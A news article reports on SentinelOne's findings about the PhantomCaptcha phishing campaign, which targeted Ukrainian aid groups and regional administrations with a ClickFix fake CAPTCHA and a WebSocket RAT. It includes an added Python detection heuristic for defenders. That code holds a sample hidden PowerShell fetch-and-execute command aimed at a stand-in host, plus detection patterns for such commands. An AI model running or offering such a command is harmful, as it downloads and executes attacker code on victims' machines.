Наталя Хандусенко, Hot News
23 October 2025, 14:34
PhantomCaptcha phishing campaign: Russian hackers target state administrations and organizations assisting Ukraine
Cybersecurity researchers at SentinelOne have released details of a coordinated phishing attack dubbed PhantomCaptcha, targeting aid organizations in Ukraine, as well as state administrations in four regions, with the aim of deploying a remote access Trojan.
According to a new report from SentinelOne, on October 8, 2025, individual members of the International Red Cross, the Norwegian Refugee Council, the UNICEF Ukraine office, and the Council of Europe Damage Register, as well as the regional administrations of Ukraine's Donetsk, Dnipropetrovsk, Poltava, and Mykolaiv regions, were targeted in the attack, The Hacker News reports.
Victims were sent phishing emails that mimicked the Office of the President of Ukraine. The email contained a PDF document with an embedded link. Clicking on the link directed the victim to a fake Zoom website (“zoomconference[.]app”).
At this point, a fake Cloudflare CAPTCHA page in the ClickFix style was triggered. Under the guise of a browser check, it tricked the victim into executing a malicious PowerShell command by pasting it into the Windows Run dialog.
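As an added illustration (not code from SentinelOne's report or from this article), the following Python heuristic flags the execution path just described: a shell spawned from the Windows Run dialog, which is hosted by explorer.exe, with a command line built for hidden fetch-and-execute. The events, field names, and the lure URL are constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names);
# these are sample inputs written for this example, not data from the report.
SAMPLE_EVENTS = [
    {   # benign: a user opening a console from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": '"powershell.exe"',
    },
    {   # ClickFix-style: pasted into Win+R, hidden window, fetch-and-execute
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -nop -ep bypass -c "iex (iwr https://lure.example/c)"',
    },
    {   # maintenance script: encoded command, but a non-interactive parent
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NonInteractive -EncodedCommand AAAA",
    },
]

# The Run dialog runs inside explorer.exe, so a shell launched from it has
# explorer.exe as its parent; that parent/child pair is the pivot here.
INTERACTIVE_PARENTS = ("explorer.exe",)
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# Tokens typical of fetch-and-execute one-liners; each hit adds to the score.
SUSPICIOUS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-enc(?:odedcommand)?\b", "encoded command"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression", "invoke-expression"),
    (r"\biwr\b|invoke-webrequest|downloadstring|net\.webclient", "web download"),
    (r"https?://", "remote URL"),
]

def classify(event):
    """Return (score, reasons) for one process-creation event."""
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if parent not in INTERACTIVE_PARENTS or image not in SHELL_IMAGES:
        return 0, []
    cmd = event["CommandLine"].lower()
    reasons = [label for pattern, label in SUSPICIOUS if re.search(pattern, cmd)]
    return len(reasons), reasons

def flag_clickfix(events, threshold=2):
    """Return (command line, reasons) for events scoring at or above threshold."""
    hits = []
    for event in events:
        score, reasons = classify(event)
        if score >= threshold:
            hits.append((event["CommandLine"], reasons))
    return hits
```

The same pivot works against the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, where the Run dialog keeps a history of what was typed into it.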
The fake Cloudflare page also opened a WebSocket connection to the attackers' server. Although the researchers did not observe this channel being used, they suspect it is intended for live social engineering sessions.
The PowerShell command launches an encrypted loader whose primary function is to retrieve and execute a second-stage payload from a remote server. This second-stage malware performs reconnaissance on the compromised host and sends the collected data to the same server, which in turn returns a PowerShell-based remote access trojan.
“The final payload is a WebSocket-based remote access trojan hosted on Russian infrastructure that allows for arbitrary remote command execution, data theft, and potential deployment of additional malware,” security researcher Tom Hegel said. “This WebSocket-based RAT is a remote command execution backdoor, essentially a remote shell that gives the operator arbitrary access to the host (computer).”
A closer analysis of the downloads on VirusTotal showed that this 8-page malicious PDF file was downloaded from various countries — Ukraine, India, Italy, and Slovakia — likely indicating a wide geographic reach of targets.
SentinelOne noted that preparations for the campaign began on March 27, 2025, which may indicate complex planning.
The campaign has not been officially attributed to any known attacker or group, although its use of the ClickFix method overlaps with recently exposed attacks by the Russian-linked COLDRIVER hacking group.
“The PhantomCaptcha campaign reflects a highly skilled adversary that demonstrates extensive operational planning, a distributed infrastructure, and deliberate control of visibility,” SentinelOne said. “The six-month period between the initial registration of the infrastructure and the execution of the attack, followed by the rapid takedown of user-facing domains while maintaining a ‘command and control’ backend, highlights that the operator is well-versed in both offensive techniques and methods of evading defensive detection.”